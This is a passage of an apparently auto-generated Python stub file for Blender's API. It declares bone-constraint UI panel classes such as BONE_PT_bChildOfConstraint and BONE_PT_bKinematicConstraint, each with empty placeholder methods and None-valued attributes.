def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bChildOfConstraint(ConstraintButtonsPanel, BoneConstraintPanel,
bpy_types.Panel, bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bClampToConstraint(ConstraintButtonsPanel, BoneConstraintPanel,
bpy_types.Panel, bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bDampTrackConstraint(ConstraintButtonsPanel, BoneConstraintPanel,
bpy_types.Panel, bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bDistLimitConstraint(ConstraintButtonsPanel, BoneConstraintPanel,
bpy_types.Panel, bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bFollowPathConstraint(ConstraintButtonsPanel,
BoneConstraintPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bFollowTrackConstraint(ConstraintButtonsPanel,
BoneConstraintPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bKinematicConstraint(ConstraintButtonsPanel, BoneConstraintPanel,
bpy_types.Panel, bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bLocLimitConstraint(ConstraintButtonsPanel, BoneConstraintPanel,
bpy_types.Panel, bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bLocateLikeConstraint(ConstraintButtonsPanel,
BoneConstraintPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bLockTrackConstraint(ConstraintButtonsPanel, BoneConstraintPanel,
bpy_types.Panel, bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bMinMaxConstraint(ConstraintButtonsPanel, BoneConstraintPanel,
bpy_types.Panel, bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
